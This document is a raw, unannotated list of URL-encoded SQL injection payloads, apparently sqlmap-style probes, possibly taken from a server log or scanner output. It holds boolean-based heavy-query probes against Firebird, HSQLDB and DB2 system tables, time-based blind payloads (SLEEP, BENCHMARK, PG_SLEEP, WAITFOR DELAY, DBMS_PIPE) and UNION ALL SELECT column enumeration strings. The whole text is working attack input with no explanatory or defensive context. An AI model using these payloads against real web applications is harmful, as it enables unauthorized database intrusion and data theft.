-2592%00%27%29%20OR%208295%3D%28SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%2CRDB%24FUNCTIONS%20AS%20T4%29%20AND%20%28%27YJfM%27%3D%27YJfM -1460%00%27%20OR%208295%3D%28SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%2CRDB%24FUNCTIONS%20AS%20T4%29%20AND%20%27pWCZ%27%3D%27pWCZ -6032%27%29%20WHERE%205927%3D5927%20OR%208295%3D%28SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%2CRDB%24FUNCTIONS%20AS%20T4%29%20--%20 -4166%22%29%20WHERE%206672%3D6672%20OR%208295%3D%28SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%2CRDB%24FUNCTIONS%20AS%20T4%29%20--%20 -6630%27%20WHERE%205612%3D5612%20OR%208295%3D%28SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%2CRDB%24FUNCTIONS%20AS%20T4%29%20--%20 -6842%22%20WHERE%201755%3D1755%20OR%208295%3D%28SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%2CRDB%24FUNCTIONS%20AS%20T4%29%20--%20 -4284%29%20OR%203473%3D%28SELECT%20COUNT%28%2A%29%20FROM%20DOMAIN.DOMAINS%20AS%20T1%2CDOMAIN.COLUMNS%20AS%20T2%2CDOMAIN.TABLES%20AS%20T3%29 -6632%29%20OR%203473%3D%28SELECT%20COUNT%28%2A%29%20FROM%20DOMAIN.DOMAINS%20AS%20T1%2CDOMAIN.COLUMNS%20AS%20T2%2CDOMAIN.TABLES%20AS%20T3%29%20AND%20%283919%3D3919 -1407%29%29%20OR%203473%3D%28SELECT%20COUNT%28%2A%29%20FROM%20DOMAIN.DOMAINS%20AS%20T1%2CDOMAIN.COLUMNS%20AS%20T2%2CDOMAIN.TABLES%20AS%20T3%29%20AND%20%28%284228%3D4228 -6067%29%29%29%20OR%203473%3D%28SELECT%20COUNT%28%2A%29%20FROM%20DOMAIN.DOMAINS%20AS%20T1%2CDOMAIN.COLUMNS%20AS%20T2%2CDOMAIN.TABLES%20AS%20T3%29%20AND%20%28%28%284520%3D4520 -9684%20OR%203473%3D%28SELECT%20COUNT%28%2A%29%20FROM%20DOMAIN.DOMAINS%20AS%20T1%2CDOMAIN.COLUMNS%20AS%20T2%2CDOMAIN.TABLES%20AS%20T3%29 -3014%29%20WHERE%208780%3D8780%20OR%203473%3D%28SELECT%20COUNT%28%2A%29%20FROM%20DOMAIN.DOMAINS%20AS%20T1%2CDOMAIN.COLUMNS%20AS%20T2%2CDOMAIN.TABLES%20AS%20T3%29%20--%20 -7111%20WHERE%208152%3D8152%20OR%203473%3D%28SELECT%20COUNT%28%2A%29%20FROM%20DOMAIN.DOMAINS%20AS%20T1%2CDOMAIN.COLUMNS%20AS%20T2%2CDOMAIN.TABLES%20AS%20T3%29%20--%20 -2629%27%29%20OR%203473%3D%28SELECT%20COUNT%28%2A%29%20FROM%20DOMAIN.DOMAINS%20AS%20T1%2CDOMAIN.COLUMNS%20AS%20T2%2CDOMAIN.TABLES%20AS%20T3%29 -4937%27%20OR%203473%3D%28SELECT%20COUNT%28%2A%29%20FROM%20DOMAIN.DOMAINS%20AS%20T1%2CDOMAIN.COLUMNS%20AS%20T2%2CDOMAIN.TABLES%20AS%20T3%29 -6368%22%20OR%203473%3D%28SELECT%20COUNT%28%2A%29%20FROM%20DOMAIN.DOMAINS%20AS%20T1%2CDOMAIN.COLUMNS%20AS%20T2%2CDOMAIN.TABLES%20AS%20T3%29 -5945%27%29%20OR%203473%3D%28SELECT%20COUNT%28%2A%29%20FROM%20DOMAIN.DOMAINS%20AS%20T1%2CDOMAIN.COLUMNS%20AS%20T2%2CDOMAIN.TABLES%20AS%20T3%29%20AND%20%28%27INDH%27%3D%27INDH -6875%27%29%29%20OR%203473%3D%28SELECT%20COUNT%28%2A%29%20FROM%20DOMAIN.DOMAINS%20AS%20T1%2CDOMAIN.COLUMNS%20AS%20T2%2CDOMAIN.TABLES%20AS%20T3%29%20AND%20%28%28%27iLUo%27%3D%27iLUo -4054%27%29%29%29%20OR%203473%3D%28SELECT%20COUNT%28%2A%29%20FROM%20DOMAIN.DOMAINS%20AS%20T1%2CDOMAIN.COLUMNS%20AS%20T2%2CDOMAIN.TABLES%20AS%20T3%29%20AND%20%28%28%28%27UXqA%27%3D%27UXqA -6133%27%20OR%203473%3D%28SELECT%20COUNT%28%2A%29%20FROM%20DOMAIN.DOMAINS%20AS%20T1%2CDOMAIN.COLUMNS%20AS%20T2%2CDOMAIN.TABLES%20AS%20T3%29%20AND%20%27DyBK%27%3D%27DyBK -4371%27%29%20OR%203473%3D%28SELECT%20COUNT%28%2A%29%20FROM%20DOMAIN.DOMAINS%20AS%20T1%2CDOMAIN.COLUMNS%20AS%20T2%2CDOMAIN.TABLES%20AS%20T3%29%20AND%20%28%27fcpN%27%20LIKE%20%27fcpN -3089%27%29%29%20OR%203473%3D%28SELECT%20COUNT%28%2A%29%20FROM%20DOMAIN.DOMAINS%20AS%20T1%2CDOMAIN.COLUMNS%20AS%20T2%2CDOMAIN.TABLES%20AS%20T3%29%20AND%20%28%28%27NwNd%27%20LIKE%20%27NwNd -3786%27%29%29%29%20OR%203473%3D%28SELECT%20COUNT%28%2A%29%20FROM%20DOMAIN.DOMAINS%20AS%20T1%2CDOMAIN.COLUMNS%20AS%20T2%2CDOMAIN.TABLES%20AS%20T3%29%20AND%20%28%28%28%27SFVw%27%20LIKE%20%27SFVw -8306%27%20OR%203473%3D%28SELECT%20COUNT%28%2A%29%20FROM%20DOMAIN.DOMAINS%20AS%20T1%2CDOMAIN.COLUMNS%20AS%20T2%2CDOMAIN.TABLES%20AS%20T3%29%20AND%20%27iZwu%27%20LIKE%20%27iZwu -3368%22%29%20OR%203473%3D%28SELECT%20COUNT%28%2A%29%20FROM%20DOMAIN.DOMAINS%20AS%20T1%2CDOMAIN.COLUMNS%20AS%20T2%2CDOMAIN.TABLES%20AS%20T3%29%20AND%20%28%22wHaa%22%3D%22wHaa -4106%22%29%29%20OR%203473%3D%28SELECT%20COUNT%28%2A%29%20FROM%20DOMAIN.DOMAINS%20AS%20T1%2CDOMAIN.COLUMNS%20AS%20T2%2CDOMAIN.TABLES%20AS%20T3%29%20AND%20%28%28%22lJMy%22%3D%22lJMy -2094%22%29%29%29%20OR%203473%3D%28SELECT%20COUNT%28%2A%29%20FROM%20DOMAIN.DOMAINS%20AS%20T1%2CDOMAIN.COLUMNS%20AS%20T2%2CDOMAIN.TABLES%20AS%20T3%29%20AND%20%28%28%28%22AeYL%22%3D%22AeYL -3482%22%20OR%203473%3D%28SELECT%20COUNT%28%2A%29%20FROM%20DOMAIN.DOMAINS%20AS%20T1%2CDOMAIN.COLUMNS%20AS%20T2%2CDOMAIN.TABLES%20AS%20T3%29%20AND%20%22UJBg%22%3D%22UJBg -8582%22%29%20OR%203473%3D%28SELECT%20COUNT%28%2A%29%20FROM%20DOMAIN.DOMAINS%20AS%20T1%2CDOMAIN.COLUMNS%20AS%20T2%2CDOMAIN.TABLES%20AS%20T3%29%20AND%20%28%22gIPu%22%20LIKE%20%22gIPu -7225%22%29%29%20OR%203473%3D%28SELECT%20COUNT%28%2A%29%20FROM%20DOMAIN.DOMAINS%20AS%20T1%2CDOMAIN.COLUMNS%20AS%20T2%2CDOMAIN.TABLES%20AS%20T3%29%20AND%20%28%28%22udJj%22%20LIKE%20%22udJj -6977%22%29%29%29%20OR%203473%3D%28SELECT%20COUNT%28%2A%29%20FROM%20DOMAIN.DOMAINS%20AS%20T1%2CDOMAIN.COLUMNS%20AS%20T2%2CDOMAIN.TABLES%20AS%20T3%29%20AND%20%28%28%28%22RpKy%22%20LIKE%20%22RpKy -1314%22%20OR%203473%3D%28SELECT%20COUNT%28%2A%29%20FROM%20DOMAIN.DOMAINS%20AS%20T1%2CDOMAIN.COLUMNS%20AS%20T2%2CDOMAIN.TABLES%20AS%20T3%29%20AND%20%22XxfP%22%20LIKE%20%22XxfP -6869%25%27%29%20OR%203473%3D%28SELECT%20COUNT%28%2A%29%20FROM%20DOMAIN.DOMAINS%20AS%20T1%2CDOMAIN.COLUMNS%20AS%20T2%2CDOMAIN.TABLES%20AS%20T3%29%20AND%20%28%27%25%27%3D%27 -5996%25%27%29%29%20OR%203473%3D%28SELECT%20COUNT%28%2A%29%20FROM%20DOMAIN.DOMAINS%20AS%20T1%2CDOMAIN.COLUMNS%20AS%20T2%2CDOMAIN.TABLES%20AS%20T3%29%20AND%20%28%28%27%25%27%3D%27 -9718%25%27%29%29%29%20OR%203473%3D%28SELECT%20COUNT%28%2A%29%20FROM%20DOMAIN.DOMAINS%20AS%20T1%2CDOMAIN.COLUMNS%20AS%20T2%2CDOMAIN.TABLES%20AS%20T3%29%20AND%20%28%28%28%27%25%27%3D%27 -2497%25%27%20OR%203473%3D%28SELECT%20COUNT%28%2A%29%20FROM%20DOMAIN.DOMAINS%20AS%20T1%2CDOMAIN.COLUMNS%20AS%20T2%2CDOMAIN.TABLES%20AS%20T3%29%20AND%20%27%25%27%3D%27 -7054%00%27%29%20OR%203473%3D%28SELECT%20COUNT%28%2A%29%20FROM%20DOMAIN.DOMAINS%20AS%20T1%2CDOMAIN.COLUMNS%20AS%20T2%2CDOMAIN.TABLES%20AS%20T3%29%20AND%20%28%27fopV%27%3D%27fopV -5165%00%27%20OR%203473%3D%28SELECT%20COUNT%28%2A%29%20FROM%20DOMAIN.DOMAINS%20AS%20T1%2CDOMAIN.COLUMNS%20AS%20T2%2CDOMAIN.TABLES%20AS%20T3%29%20AND%20%27WUGi%27%3D%27WUGi -8547%27%29%20WHERE%203750%3D3750%20OR%203473%3D%28SELECT%20COUNT%28%2A%29%20FROM%20DOMAIN.DOMAINS%20AS%20T1%2CDOMAIN.COLUMNS%20AS%20T2%2CDOMAIN.TABLES%20AS%20T3%29%20--%20 -6186%22%29%20WHERE%209939%3D9939%20OR%203473%3D%28SELECT%20COUNT%28%2A%29%20FROM%20DOMAIN.DOMAINS%20AS%20T1%2CDOMAIN.COLUMNS%20AS%20T2%2CDOMAIN.TABLES%20AS%20T3%29%20--%20 -8080%27%20WHERE%207737%3D7737%20OR%203473%3D%28SELECT%20COUNT%28%2A%29%20FROM%20DOMAIN.DOMAINS%20AS%20T1%2CDOMAIN.COLUMNS%20AS%20T2%2CDOMAIN.TABLES%20AS%20T3%29%20--%20 -5409%22%20WHERE%209706%3D9706%20OR%203473%3D%28SELECT%20COUNT%28%2A%29%20FROM%20DOMAIN.DOMAINS%20AS%20T1%2CDOMAIN.COLUMNS%20AS%20T2%2CDOMAIN.TABLES%20AS%20T3%29%20--%20 -5110%29%20OR%208346%3D%28SELECT%20COUNT%28%2A%29%20FROM%20SYSIBM.SYSTABLES%20AS%20T1%2CSYSIBM.SYSTABLES%20AS%20T2%2CSYSIBM.SYSTABLES%20AS%20T3%29 -8807%29%20OR%208346%3D%28SELECT%20COUNT%28%2A%29%20FROM%20SYSIBM.SYSTABLES%20AS%20T1%2CSYSIBM.SYSTABLES%20AS%20T2%2CSYSIBM.SYSTABLES%20AS%20T3%29%20AND%20%283744%3D3744 -2197%29%29%20OR%208346%3D%28SELECT%20COUNT%28%2A%29%20FROM%20SYSIBM.SYSTABLES%20AS%20T1%2CSYSIBM.SYSTABLES%20AS%20T2%2CSYSIBM.SYSTABLES%20AS%20T3%29%20AND%20%28%289332%3D9332 -8589%29%29%29%20OR%208346%3D%28SELECT%20COUNT%28%2A%29%20FROM%20SYSIBM.SYSTABLES%20AS%20T1%2CSYSIBM.SYSTABLES%20AS%20T2%2CSYSIBM.SYSTABLES%20AS%20T3%29%20AND%20%28%28%281333%3D1333 -9621%20OR%208346%3D%28SELECT%20COUNT%28%2A%29%20FROM%20SYSIBM.SYSTABLES%20AS%20T1%2CSYSIBM.SYSTABLES%20AS%20T2%2CSYSIBM.SYSTABLES%20AS%20T3%29 -8245%29%20WHERE%201459%3D1459%20OR%208346%3D%28SELECT%20COUNT%28%2A%29%20FROM%20SYSIBM.SYSTABLES%20AS%20T1%2CSYSIBM.SYSTABLES%20AS%20T2%2CSYSIBM.SYSTABLES%20AS%20T3%29%20--%20 -1505%20WHERE%209423%3D9423%20OR%208346%3D%28SELECT%20COUNT%28%2A%29%20FROM%20SYSIBM.SYSTABLES%20AS%20T1%2CSYSIBM.SYSTABLES%20AS%20T2%2CSYSIBM.SYSTABLES%20AS%20T3%29%20--%20 -8003%27%29%20OR%208346%3D%28SELECT%20COUNT%28%2A%29%20FROM%20SYSIBM.SYSTABLES%20AS%20T1%2CSYSIBM.SYSTABLES%20AS%20T2%2CSYSIBM.SYSTABLES%20AS%20T3%29 -1633%27%20OR%208346%3D%28SELECT%20COUNT%28%2A%29%20FROM%20SYSIBM.SYSTABLES%20AS%20T1%2CSYSIBM.SYSTABLES%20AS%20T2%2CSYSIBM.SYSTABLES%20AS%20T3%29 -5414%22%20OR%208346%3D%28SELECT%20COUNT%28%2A%29%20FROM%20SYSIBM.SYSTABLES%20AS%20T1%2CSYSIBM.SYSTABLES%20AS%20T2%2CSYSIBM.SYSTABLES%20AS%20T3%29 -2762%27%29%20OR%208346%3D%28SELECT%20COUNT%28%2A%29%20FROM%20SYSIBM.SYSTABLES%20AS%20T1%2CSYSIBM.SYSTABLES%20AS%20T2%2CSYSIBM.SYSTABLES%20AS%20T3%29%20AND%20%28%27lNhp%27%3D%27lNhp -3938%27%29%29%20OR%208346%3D%28SELECT%20COUNT%28%2A%29%20FROM%20SYSIBM.SYSTABLES%20AS%20T1%2CSYSIBM.SYSTABLES%20AS%20T2%2CSYSIBM.SYSTABLES%20AS%20T3%29%20AND%20%28%28%27CiJb%27%3D%27CiJb -7719%27%29%29%29%20OR%208346%3D%28SELECT%20COUNT%28%2A%29%20FROM%20SYSIBM.SYSTABLES%20AS%20T1%2CSYSIBM.SYSTABLES%20AS%20T2%2CSYSIBM.SYSTABLES%20AS%20T3%29%20AND%20%28%28%28%27rumJ%27%3D%27rumJ -6406%27%20OR%208346%3D%28SELECT%20COUNT%28%2A%29%20FROM%20SYSIBM.SYSTABLES%20AS%20T1%2CSYSIBM.SYSTABLES%20AS%20T2%2CSYSIBM.SYSTABLES%20AS%20T3%29%20AND%20%27IxsP%27%3D%27IxsP -8801%27%29%20OR%208346%3D%28SELECT%20COUNT%28%2A%29%20FROM%20SYSIBM.SYSTABLES%20AS%20T1%2CSYSIBM.SYSTABLES%20AS%20T2%2CSYSIBM.SYSTABLES%20AS%20T3%29%20AND%20%28%27USct%27%20LIKE%20%27USct -6939%27%29%29%20OR%208346%3D%28SELECT%20COUNT%28%2A%29%20FROM%20SYSIBM.SYSTABLES%20AS%20T1%2CSYSIBM.SYSTABLES%20AS%20T2%2CSYSIBM.SYSTABLES%20AS%20T3%29%20AND%20%28%28%27lUhX%27%20LIKE%20%27lUhX -8724%27%29%29%29%20OR%208346%3D%28SELECT%20COUNT%28%2A%29%20FROM%20SYSIBM.SYSTABLES%20AS%20T1%2CSYSIBM.SYSTABLES%20AS%20T2%2CSYSIBM.SYSTABLES%20AS%20T3%29%20AND%20%28%28%28%27fDvK%27%20LIKE%20%27fDvK -3250%27%20OR%208346%3D%28SELECT%20COUNT%28%2A%29%20FROM%20SYSIBM.SYSTABLES%20AS%20T1%2CSYSIBM.SYSTABLES%20AS%20T2%2CSYSIBM.SYSTABLES%20AS%20T3%29%20AND%20%27MNGH%27%20LIKE%20%27MNGH -5852%22%29%20OR%208346%3D%28SELECT%20COUNT%28%2A%29%20FROM%20SYSIBM.SYSTABLES%20AS%20T1%2CSYSIBM.SYSTABLES%20AS%20T2%2CSYSIBM.SYSTABLES%20AS%20T3%29%20AND%20%28%22wCPD%22%3D%22wCPD -3196%22%29%29%20OR%208346%3D%28SELECT%20COUNT%28%2A%29%20FROM%20SYSIBM.SYSTABLES%20AS%20T1%2CSYSIBM.SYSTABLES%20AS%20T2%2CSYSIBM.SYSTABLES%20AS%20T3%29%20AND%20%28%28%22DcnR%22%3D%22DcnR -2286%22%29%29%29%20OR%208346%3D%28SELECT%20COUNT%28%2A%29%20FROM%20SYSIBM.SYSTABLES%20AS%20T1%2CSYSIBM.SYSTABLES%20AS%20T2%2CSYSIBM.SYSTABLES%20AS%20T3%29%20AND%20%28%28%28%22NxIN%22%3D%22NxIN -5656%22%20OR%208346%3D%28SELECT%20COUNT%28%2A%29%20FROM%20SYSIBM.SYSTABLES%20AS%20T1%2CSYSIBM.SYSTABLES%20AS%20T2%2CSYSIBM.SYSTABLES%20AS%20T3%29%20AND%20%22yNCG%22%3D%22yNCG -2943%22%29%20OR%208346%3D%28SELECT%20COUNT%28%2A%29%20FROM%20SYSIBM.SYSTABLES%20AS%20T1%2CSYSIBM.SYSTABLES%20AS%20T2%2CSYSIBM.SYSTABLES%20AS%20T3%29%20AND%20%28%22CyXX%22%20LIKE%20%22CyXX -5471%22%29%29%20OR%208346%3D%28SELECT%20COUNT%28%2A%29%20FROM%20SYSIBM.SYSTABLES%20AS%20T1%2CSYSIBM.SYSTABLES%20AS%20T2%2CSYSIBM.SYSTABLES%20AS%20T3%29%20AND%20%28%28%22nrHX%22%20LIKE%20%22nrHX -7712%22%29%29%29%20OR%208346%3D%28SELECT%20COUNT%28%2A%29%20FROM%20SYSIBM.SYSTABLES%20AS%20T1%2CSYSIBM.SYSTABLES%20AS%20T2%2CSYSIBM.SYSTABLES%20AS%20T3%29%20AND%20%28%28%28%22LOaK%22%20LIKE%20%22LOaK -4067%22%20OR%208346%3D%28SELECT%20COUNT%28%2A%29%20FROM%20SYSIBM.SYSTABLES%20AS%20T1%2CSYSIBM.SYSTABLES%20AS%20T2%2CSYSIBM.SYSTABLES%20AS%20T3%29%20AND%20%22SZRo%22%20LIKE%20%22SZRo -5657%25%27%29%20OR%208346%3D%28SELECT%20COUNT%28%2A%29%20FROM%20SYSIBM.SYSTABLES%20AS%20T1%2CSYSIBM.SYSTABLES%20AS%20T2%2CSYSIBM.SYSTABLES%20AS%20T3%29%20AND%20%28%27%25%27%3D%27 -6590%25%27%29%29%20OR%208346%3D%28SELECT%20COUNT%28%2A%29%20FROM%20SYSIBM.SYSTABLES%20AS%20T1%2CSYSIBM.SYSTABLES%20AS%20T2%2CSYSIBM.SYSTABLES%20AS%20T3%29%20AND%20%28%28%27%25%27%3D%27 -2421%25%27%29%29%29%20OR%208346%3D%28SELECT%20COUNT%28%2A%29%20FROM%20SYSIBM.SYSTABLES%20AS%20T1%2CSYSIBM.SYSTABLES%20AS%20T2%2CSYSIBM.SYSTABLES%20AS%20T3%29%20AND%20%28%28%28%27%25%27%3D%27 -3699%25%27%20OR%208346%3D%28SELECT%20COUNT%28%2A%29%20FROM%20SYSIBM.SYSTABLES%20AS%20T1%2CSYSIBM.SYSTABLES%20AS%20T2%2CSYSIBM.SYSTABLES%20AS%20T3%29%20AND%20%27%25%27%3D%27 -8630%00%27%29%20OR%208346%3D%28SELECT%20COUNT%28%2A%29%20FROM%20SYSIBM.SYSTABLES%20AS%20T1%2CSYSIBM.SYSTABLES%20AS%20T2%2CSYSIBM.SYSTABLES%20AS%20T3%29%20AND%20%28%27DmDT%27%3D%27DmDT -7917%00%27%20OR%208346%3D%28SELECT%20COUNT%28%2A%29%20FROM%20SYSIBM.SYSTABLES%20AS%20T1%2CSYSIBM.SYSTABLES%20AS%20T2%2CSYSIBM.SYSTABLES%20AS%20T3%29%20AND%20%27faeD%27%3D%27faeD -5258%27%29%20WHERE%209612%3D9612%20OR%208346%3D%28SELECT%20COUNT%28%2A%29%20FROM%20SYSIBM.SYSTABLES%20AS%20T1%2CSYSIBM.SYSTABLES%20AS%20T2%2CSYSIBM.SYSTABLES%20AS%20T3%29%20--%20 -7463%22%29%20WHERE%207890%3D7890%20OR%208346%3D%28SELECT%20COUNT%28%2A%29%20FROM%20SYSIBM.SYSTABLES%20AS%20T1%2CSYSIBM.SYSTABLES%20AS%20T2%2CSYSIBM.SYSTABLES%20AS%20T3%29%20--%20 -6222%27%20WHERE%206248%3D6248%20OR%208346%3D%28SELECT%20COUNT%28%2A%29%20FROM%20SYSIBM.SYSTABLES%20AS%20T1%2CSYSIBM.SYSTABLES%20AS%20T2%2CSYSIBM.SYSTABLES%20AS%20T3%29%20--%20 -8568%22%20WHERE%202179%3D2179%20OR%208346%3D%28SELECT%20COUNT%28%2A%29%20FROM%20SYSIBM.SYSTABLES%20AS%20T1%2CSYSIBM.SYSTABLES%20AS%20T2%2CSYSIBM.SYSTABLES%20AS%20T3%29%20--%20 %28SELECT%20%28CASE%20WHEN%20%284652%3D4652%29%20THEN%20SLEEP%285%29%20ELSE%204652%2A%28SELECT%204652%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%29%20END%29%29 %28SELECT%20%28CASE%20WHEN%20%281436%3D1436%29%20THEN%20%28SELECT%20BENCHMARK%285000000%2CMD5%280x4b4a4e73%29%29%29%20ELSE%201436%2A%28SELECT%201436%20FROM%20mysql.db%29%20END%29%29 %281299%3D1299%29%2ASLEEP%285%29 MAKE_SET%287866%3D7866%2CSLEEP%285%29%29 ELT%284119%3D4119%2CSLEEP%285%29%29 %28SELECT%203177%20FROM%20PG_SLEEP%285%29%29 %28SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29%29 %28SELECT%20%28CASE%20WHEN%20%282291%3D2291%29%20THEN%20WAITFOR%20DELAY%20%270%3A0%3A5%27%20ELSE%202291%2A%28SELECT%202291%20FROM%20master..sysdatabases%29%20END%29%29 %28SELECT%20%28CASE%20WHEN%20%282290%3D2290%29%20THEN%20%28SELECT%20COUNT%28%2A%29%20FROM%20sysusers%20AS%20sys1%2Csysusers%20AS%20sys2%2Csysusers%20AS%20sys3%2Csysusers%20AS%20sys4%2Csysusers%20AS%20sys5%2Csysusers%20AS%20sys6%2Csysusers%20AS%20sys7%29%20ELSE%202290%20END%29%29 %28SELECT%20%28CASE%20WHEN%20%289775%3D9775%29%20THEN%20DBMS_PIPE.RECEIVE_MESSAGE%28CHR%2870%29%7C%7CCHR%28116%29%7C%7CCHR%2867%29%7C%7CCHR%28119%29%2C5%29%20ELSE%209775%20END%29%20FROM%20DUAL%29 %28SELECT%20%28CASE%20WHEN%20%284710%3D4710%29%20THEN%20%28SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5%29%20ELSE%204710%20END%29%20FROM%20DUAL%29 %28SELECT%20LIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%28500000000%2F2%29%29%29%29%29 %28SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%2CRDB%24FUNCTIONS%20AS%20T4%29 %28SELECT%20COUNT%28%2A%29%20FROM%20DOMAIN.DOMAINS%20AS%20T1%2CDOMAIN.COLUMNS%20AS%20T2%2CDOMAIN.TABLES%20AS%20T3%29 %28SELECT%20COUNT%28%2A%29%20FROM%20SYSIBM.SYSTABLES%20AS%20T1%2CSYSIBM.SYSTABLES%20AS%20T2%2CSYSIBM.SYSTABLES%20AS%20T3%29 1%2C%28SELECT%20%28CASE%20WHEN%20%288467%3D8467%29%20THEN%20SLEEP%285%29%20ELSE%208467%2A%28SELECT%208467%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%29%20END%29%29 1%2C%28SELECT%20%28CASE%20WHEN%20%285335%3D5335%29%20THEN%20%28SELECT%20BENCHMARK%285000000%2CMD5%280x67716b66%29%29%29%20ELSE%205335%2A%28SELECT%205335%20FROM%20mysql.db%29%20END%29%29 1%2C%28SELECT%20%28CASE%20WHEN%20%281652%3D1652%29%20THEN%20%28SELECT%201652%20FROM%20PG_SLEEP%285%29%29%20ELSE%201%2F%28SELECT%200%29%20END%29%29 1%2C%28SELECT%20%28CASE%20WHEN%20%285633%3D5633%29%20THEN%20%28SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29%29%20ELSE%201%2F%28SELECT%200%29%20END%29%29 1%2C%28SELECT%20%28CASE%20WHEN%20%283896%3D3896%29%20THEN%20WAITFOR%20DELAY%20%270%3A0%3A5%27%20ELSE%203896%2A%28SELECT%203896%20FROM%20master..sysdatabases%29%20END%29%29 1%2C%28SELECT%20%28CASE%20WHEN%20%281425%3D1425%29%20THEN%20%28SELECT%20COUNT%28%2A%29%20FROM%20sysusers%20AS%20sys1%2Csysusers%20AS%20sys2%2Csysusers%20AS%20sys3%2Csysusers%20AS%20sys4%2Csysusers%20AS%20sys5%2Csysusers%20AS%20sys6%2Csysusers%20AS%20sys7%29%20ELSE%201425%2A%28SELECT%201425%20FROM%20master..sysdatabases%29%20END%29%29 1%2C%28SELECT%20%28CASE%20WHEN%20%282353%3D2353%29%20THEN%20DBMS_PIPE.RECEIVE_MESSAGE%28CHR%28118%29%7C%7CCHR%2868%29%7C%7CCHR%2883%29%7C%7CCHR%2880%29%2C5%29%20ELSE%201%2F%28SELECT%200%20FROM%20DUAL%29%20END%29%20FROM%20DUAL%29 1%2C%28SELECT%20%28CASE%20WHEN%20%288684%3D8684%29%20THEN%20%28SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5%29%20ELSE%201%2F%28SELECT%200%20FROM%20DUAL%29%20END%29%20FROM%20DUAL%29 1%29%20ORDER%20BY%201%23 1%29%20ORDER%20BY%207852%23 1%29%20UNION%20ALL%20SELECT%20NULL%23 1%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%23 1%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%23 1%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%23 1%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%29%20ORDER%20BY%201%23 1%29%20ORDER%20BY%204589%23 1%29%20UNION%20ALL%20SELECT%20NULL%23 1%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%23 1%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%23 1%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%23 1%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%29%29%20ORDER%20BY%201%23 1%29%29%20ORDER%20BY%202755%23 1%29%29%20UNION%20ALL%20SELECT%20NULL%23 1%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%23 1%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%23 1%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%23 1%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%29%29%29%20ORDER%20BY%201%23 